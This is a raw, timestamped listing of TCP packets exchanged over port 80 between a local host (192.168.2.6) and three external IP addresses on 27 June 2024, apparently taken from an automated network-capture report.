                                                                Jun 27, 2024 05:59:06.750852108 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750865936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750880003 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750910044 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.750936031 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.750955105 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750969887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.751008034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.751027107 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.751046896 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.751156092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.751169920 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.751204014 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.751233101 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762075901 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762090921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762111902 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762146950 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762171030 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762204885 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762218952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762233019 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762247086 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762263060 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762300968 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762447119 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762461901 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762499094 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762523890 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762587070 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762602091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762615919 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762629986 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762638092 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762651920 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762665987 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762711048 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762895107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762908936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762922049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762933969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762940884 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762953997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762967110 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.762976885 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.762990952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763005018 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763017893 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763030052 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763041973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763056040 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763065100 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763078928 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763087988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763108969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763132095 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763458014 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763469934 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763478041 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763492107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763504982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763520002 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763531923 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763542891 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763556957 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763567924 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763588905 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763614893 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763786077 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763801098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763814926 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763832092 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763847113 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763854027 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763866901 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763887882 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763895035 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763917923 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763927937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763936996 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763950109 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763966084 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.763976097 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.763988972 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764008999 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764414072 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764429092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764460087 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764470100 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764489889 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764498949 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764508963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764522076 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764535904 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764544010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764560938 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764568090 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764578104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764589071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764596939 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764604092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764611959 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764619112 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764626026 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764632940 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764647007 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764661074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.764682055 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.764708996 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765233994 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765248060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765261889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765275002 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765285015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765301943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765307903 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765330076 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765336037 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765348911 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765357971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765392065 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765399933 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765414000 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765435934 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765460014 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765674114 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765688896 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765696049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765708923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765717030 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765753031 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765774012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765832901 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765847921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765861988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765893936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765907049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765921116 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765932083 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765944004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765958071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765974998 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.765981913 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.765994072 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.766019106 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.766031981 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766046047 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766073942 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.766096115 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.766638041 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766652107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766665936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766679049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766690969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.766700983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766715050 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.766724110 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766736031 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.766746998 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.766781092 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.818140030 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818167925 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818181038 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818249941 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818264008 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818278074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818291903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818341017 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.818394899 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.818449974 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.818506002 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.841631889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841656923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841672897 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841759920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.841789007 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841810942 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841825962 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841839075 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841849089 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.841864109 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841886044 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.841912031 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.841967106 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.841991901 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.842006922 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.842053890 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.842071056 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.842164040 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.842179060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.842221975 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.842232943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.842247963 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.842274904 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.842303991 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853055000 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853070974 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853085995 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853151083 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853169918 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853183985 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853212118 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853229046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853241920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853267908 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853276968 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853291035 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853305101 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853326082 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853346109 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853476048 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853491068 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853506088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853518009 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853534937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853555918 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853589058 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853607893 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853679895 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853694916 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853708982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853734016 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853760004 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.853882074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853895903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.853948116 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854036093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854049921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854063988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854082108 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854088068 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854101896 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854113102 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854125023 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854139090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854150057 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854170084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854180098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854196072 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854213953 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854422092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854448080 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854497910 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854557991 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854572058 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854585886 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854600906 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854609013 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854624033 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854635954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854646921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854660988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854671001 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854686975 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854692936 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854715109 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854734898 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.854939938 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854954004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.854983091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855000973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855006933 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855020046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855030060 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855042934 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855057955 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855072021 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855087042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855097055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855114937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855122089 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855134964 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855144024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855153084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855166912 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855189085 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855201960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855545044 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855560064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855581045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855592012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855604887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855614901 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855633020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855648994 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855655909 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855669022 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855683088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855696917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855705976 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855719090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855731964 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855741978 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855753899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855763912 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855776072 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855791092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.855801105 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855824947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.855844021 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:07.607752085 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:07.608172894 CEST4973080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:07.612816095 CEST8049728147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:07.612970114 CEST8049730147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:07.613054037 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:07.613091946 CEST4973080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:07.613451004 CEST4973080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:07.618230104 CEST8049730147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:07.672243118 CEST4973180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:59:07.677561998 CEST804973185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:59:07.681343079 CEST4973180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:59:07.681565046 CEST4973180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:59:07.686331034 CEST804973185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:59:08.289827108 CEST804973185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:59:08.289892912 CEST4973180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:59:08.290344000 CEST8049730147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:08.290400982 CEST4973080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:08.405004025 CEST4973080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:08.405441999 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:08.410113096 CEST8049730147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:08.410176992 CEST4973080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:08.410250902 CEST8049733147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:08.410312891 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:08.410465956 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:08.415250063 CEST8049733147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:09.077193975 CEST8049733147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:09.078305960 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.083626986 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.088460922 CEST8049733147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:09.290611982 CEST8049733147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:09.290771961 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.404517889 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.404998064 CEST4973480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.409610033 CEST8049733147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:09.409701109 CEST8049734147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:09.409795046 CEST4973380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.409852982 CEST4973480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.410012960 CEST4973480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:09.414747953 CEST8049734147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:10.085139990 CEST8049734147.45.47.155192.168.2.6
